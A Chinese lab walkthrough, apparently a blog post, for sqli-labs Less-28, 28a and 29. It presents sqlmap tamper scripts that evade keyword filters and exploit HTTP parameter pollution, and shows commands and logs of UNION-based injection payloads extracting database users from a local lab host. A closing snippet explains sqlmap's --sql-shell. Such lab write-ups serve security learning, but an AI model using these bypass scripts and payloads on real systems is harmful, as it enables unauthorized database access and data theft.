SQLMAP脚本-sql-labs-Less-28-29

Less-28

68f78e68510547b587a5c1290bfa6e1f.png

 

 一如既往看后端代码

11e474e22ff54a69979d6f2d20ab6cb0.png

 使用双写union绕过,编写cx.py脚本

#!/usr/bin/env python
import sys
import random
from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def tamper(payload, **kwargs):
    payload = payload.replace('or', 'oorr')
    payload = payload.replace('and', 'anandd')
    payload = payload.replace('#', ';%00')
    payload = payload.replace('union', 'uniounion')

    retVal = ""
    if payload:
        for i in range(len(payload)):
            if payload[i].isspace():
                retVal += "%0a"
            elif payload[i] == '#' or payload[i:i + 3] == '#':
                retVal += payload[i:]
                break
            else:
                retVal += payload[i]
    return retVal

python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-28/?id=1" --technique=U --hostname --tamper=./tamper/cx.py,air.py --users

[05:04:35] [INFO] retrieved: ''root'@'::1''
-3900')%0aUNION%0aALL%0aSELECT%0aNULL,NULL,(SELECT%0aCONCAT(0x71766b6b71,IFNULL(CAST(grantee%0aAS%0aNCHAR),0x20),0x7162626a71)%0aFROM%0aINFORMATION_SCHEMA.USER_PRIVILEGES%0aLIMIT%0a82,1);%00
[05:04:35] [INFO] retrieved: ''root'@'::1''
-4019')%0aUNION%0aALL%0aSELECT%0aNULL,NULL,(SELECT%0aCONCAT(0x71766b6b71,IFNULL(CAST(grantee%0aAS%0aNCHAR),0x20),0x7162626a71)%0aFROM%0aINFORMATION_SCHEMA.USER_PRIVILEGES%0aLIMIT%0a83,1);%00
[05:04:35] [INFO] retrieved: ''root'@'::1''
-3141')%0aUNION%0aALL%0aSELECT%0aNULL,NULL,(SELECT%0aCONCAT(0x71766b6b71,IFNULL(CAST(grantee%0aAS%0aNCHAR),0x20),0x7162626a71)%0aFROM%0aINFORMATION_SCHEMA.USER_PRIVILEGES%0aLIMIT%0a84,1);%00
[05:04:35] [INFO] retrieved: '''@'localhost''
database management system users [4]:                                     
[*] ''@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'

[05:04:35] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.101'                                            

[*] ending @ 05:04:35 /2023-01-03/

成功爆出

Less-28a

9fe53e2c7c6b48959e4646bfc7969e97.png

 忒忒后端代码,比28简单更多

bdbfb06097814e62bca24defdce35048.png

 一样的使用28的脚本即可拿下

python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-28a/?id=1" --technique=U --hostname --tamper=./tamper/cx.py,air.py --users

f9f8a998defa4fe88eff1b9975962268.png

Less-29

HTTP参数污染(HTTP Parameter Pollution) 攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击

这个labs是一个HTTP参数污染所以也简单写就需要&连接一些就行了,想了解这东西的去搜索吧,这里教的是怎么写脚本提供思路

b0b12514af944f009b869f4d5c309856.png

 

#!/usr/bin/env python
import sys
import random
from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def tamper(payload, **kwargs):
	str_list = list(payload)
	str_list.insert(0, "&id=-") //将&id=-衔接到payload最前面
	payload = ''.join(str_list)
	return payload

python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-29/?id=1" --technique=U --hostname --tamper=./tamper/cx.py,air.py --users
 

[05:33:27] [INFO] retrieved: ''root'@'::1''
&id=1' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a6a7671,IFNULL(CAST(grantee AS CHAR),0x20),0x71626b7071) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 78,1)-- -
[05:33:27] [INFO] retrieved: ''root'@'::1''
&id=1' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a6a7671,IFNULL(CAST(grantee AS CHAR),0x20),0x71626b7071) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 79,1)-- -
[05:33:27] [INFO] retrieved: ''root'@'::1''
&id=1' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a6a7671,IFNULL(CAST(grantee AS CHAR),0x20),0x71626b7071) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 80,1)-- -
[05:33:27] [INFO] retrieved: ''root'@'::1''
&id=1' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a6a7671,IFNULL(CAST(grantee AS CHAR),0x20),0x71626b7071) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 81,1)-- -
[05:33:27] [INFO] retrieved: ''root'@'::1''
&id=1' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a6a7671,IFNULL(CAST(grantee AS CHAR),0x20),0x71626b7071) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 82,1)-- -
[05:33:27] [INFO] retrieved: ''root'@'::1''
&id=1' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a6a7671,IFNULL(CAST(grantee AS CHAR),0x20),0x71626b7071) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 83,1)-- -
[05:33:27] [INFO] retrieved: ''root'@'::1''
&id=1' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a6a7671,IFNULL(CAST(grantee AS CHAR),0x20),0x71626b7071) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 84,1)-- -
[05:33:27] [INFO] retrieved: '''@'localhost''
database management system users [4]:                                     
[*] ''@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'

拿下

但我后面试了试直接跑也能跑出来....不管了提供思路提供思路

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用`--sql-shell`选项可以让你在目标数据库上执行任意的SQL语句。以下是使用`--sql-shell`选项的基本步骤: 1. 首先,使用SQLMap进行探测并确认数据库注入漏洞是否存在。可以使用以下命令进行探测: ``` sqlmap -u <target-URL> --dbs ``` 2. 确认存在注入漏洞之后,可以使用以下命令来获取数据库中的所有表: ``` sqlmap -u <target-URL> -D <database-name> --tables ``` 其中,`<database-name>`是你想要访问的数据库名称。 3. 根据需要选择你想要访问的表,并使用以下命令来获取表中的所有列: ``` sqlmap -u <target-URL> -D <database-name> -T <table-name> --columns ``` 其中,`<table-name>`是你想要访问的表名称。 4. 根据需要选择你想要访问的列,并使用以下命令来获取`--sql-shell`: ``` sqlmap -u <target-URL> -D <database-name> -T <table-name> -C <column-name> --sql-shell ``` 其中,`<column-name>`是你想要访问的列名称。 5. 输入`--sql-shell`后,你将进入SQL Shell命令行提示符,此时你可以输入任意的SQL命令,并按回车键执行。例如: ``` mysql> SELECT * FROM users WHERE username='admin'; ``` 这个命令将返回名为`users`的表中用户名为`admin`的行的所有数据。 请注意,这些命令只是SQLMap获取SQL Shell的基本用法。具体步骤取决于你想要访问的数据库和表。同时,需要强调的是,这种方法只适用于合法的授权情况下,任何未经授权的访问都是违法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值